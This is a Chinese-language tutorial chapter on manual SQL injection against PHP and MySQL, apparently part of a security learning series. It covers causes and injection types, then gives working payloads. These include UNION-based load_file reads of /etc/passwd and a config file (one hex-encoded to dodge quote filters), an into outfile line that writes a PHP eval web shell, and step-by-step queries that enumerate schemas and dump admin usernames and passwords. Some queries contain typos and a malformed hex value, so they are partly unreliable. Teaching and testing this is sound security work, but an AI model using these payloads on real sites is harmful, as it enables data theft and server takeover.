前言
上一章我们已经学习了如何搭建环境,接下来我们将以 PHP + MySQL 环境为例一起学习SQL注入。
简介
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
原理
针对 SQL 注入的攻击行为可描述为通过用户可控参数中注入 SQL 语法,破坏原有 SQL 结构,达到编写程序时意料之外结果的攻击行为。
其成因可以归结以下两个原因叠加造成的:
1、程序编写者在处理程序和数据库交互时,使用字符串拼接的方式构造 SQL 语句
2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到 SQL 语句中。
注入危害
攻击者利用 SQL 注入漏洞,可以获取数据库中的多种信息(例如:管理员后台密码),从而脱取数据库中内容(脱库)。在特别情况下,还可以修改数据库内容或者插入内容到数据库,如果数据库权限分配存在问题,或者数据库本身存在缺陷,那么攻击者可以通过 SQL 注入漏洞直接获取 webshell 或者服务器系统权限。
注入分类
- 根据数据类型
- 数字型注入
- 字符型注入
区别:
字符型:需要单引号闭合的就是字符型注入,并且需要注释掉后面的单引号 (注释符号:#,– – ,/*)
数值型:不需要单引号闭合,也不需要注释符号
- 根据注入语法
- UNION query SQL injection(可联合查询注入)
- Stacked queries SQL injection(可多语句查询注入)
- Error-based SQL injection(报错型注入)
- Boolean-based blind SQL injection(布尔型注入)
- Time-based blind SQL injection(基于时间延迟注入)
SQL 注入挖掘
- and 1=1 和 and 1=2 回显页面不同(整形判断)
- 单引号判断 ‘ 显示数据库错误信息或者页面回显不同(整形,字符串类型判断)
- \ (转义符)
- -1/+1 回显下一个或上一个页面(整型判断)(需要用%2b 转码+号)
- and sleep(5) (判断页面返回时间)
MySQL 中常用函数
- system_user() 系统用户名
- user() 数据库的用户名
- current_user() 当前用户名
- session_user() 连接数据库的用户名
- database() 数据库名
- version() MYSQL 数据库版本
- @@basedir 查看安装路径
- load_file(‘/etc/passwd’) MYSQL 读取本地文件的函数
MySQL 中 information_scheme 库
- SCHEMATA 表 字段:SCHEMA_NAME (数据库名字)
- TABLES 表 字段:TABLE_SCHEMA, TABLE_NAME
- COLUMNS 表 字段:TBALE_SCHEMA,TABLE_NAME,COLUMN_NAME
load_file( )函数 读文件操作
前提:
- 知道文件绝对路径
- 能够使用 union 查询
- 对 web 目录有读写权限
UNION SELECT 1,load_file('/etc/passwd'),3,4,5,6#
UNION SELECT 1,load_file('D://phpStudy//WWW//conn.php'),3,4,5,6
UNION SELECT 1,load_file(0x443A2F2F70687053747564792F2F5757572F2F636F6E6E2E706870),3,4,5,6
into outfile( )写文件操作
前提:
- 文件名必须全路径(绝对路径),
- 用户必须有写文件的权限
- 没有对 ‘ 单引号过滤
SELECT '<?php eval($_POST[1]); ?>' into outfile ' D://phpStudy//WWW//hack.php '
MySQL 中 UNION 规则
- UNION 必须由两条或两条以上的 SELECT 语句组成,语句之间用关键字 UNION 分隔
- UNION 中的每个查询必须包含相同的列。
- UNION 会从查询结果集中自动去除了重复行。
对以上知识有所了解之后我们就可以学习一些在SQL注入时常用的一些操作
- 判断字段数
挖掘出注入点之后我们可以通过 order by 来判断表的字段数
例如: www.xxx.com/test.php?id=6 order by n
注:通常使用“order by N”,通过不断变换N的值,至刚好返回正常的网页,可得到当前表的字段数
- 判断显示位
www.xxx.com/test.php?id=6 union select 1,2,3,4,5,6
- 获取当数据库名称和当前连接数据库的用户
www.xxx.com/test.php?id=-1 union select 1,2,database(),4,5,6
www.xxx.com/test.php?id=-1 union select 1,2,user(),4,5,6
- 列出所有数据库
limit 一个一个打印出来库名
select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1
group_concat 一次性全部显示
select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA
- 列出(数据库:xss)中所有的表
limit 一个一个打印出来字段名 schema
select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=’xss’ limit 0,1
group_concat 一次性全部显示
select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=0x674657374
注意:数据库名称可以用十六进制来代替字符串,这样可以绕过单引号的限制。
- 列出(数据库:xss 表:admins )中所有的字段
limit 一个一个打印出来
select COLIMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=’xss’ and
TABLENAME=’admins ‘ limit 0,1
group_concat 一次性全部显示
select group_concat(COLUMN_NAME) from information_schema.COLUMNS where
TABLE_SCHEMA=0x74657374 and TABLE_NAME=0x61646d696e
- 列出(数据库:xss 表:admins )中的数据
limit 一个一个打印出来
select username,passwd from xss.admins limit 0,1
group_concat 把 一次性全部打印
select group_concat(concat(username,0x20,passwd)) from xss.admins
本章是手工注入的一些技巧,当然在实际操作中我们很少会用手工来进行注入测试,所以下一篇我将给大家介绍一款比较常用的注入工具。
小编最近建了交流群方便大家交流学习,群内有小编平时整理的学习资料、视频、工具等。
白帽交流群 【简介】
感谢大家支持。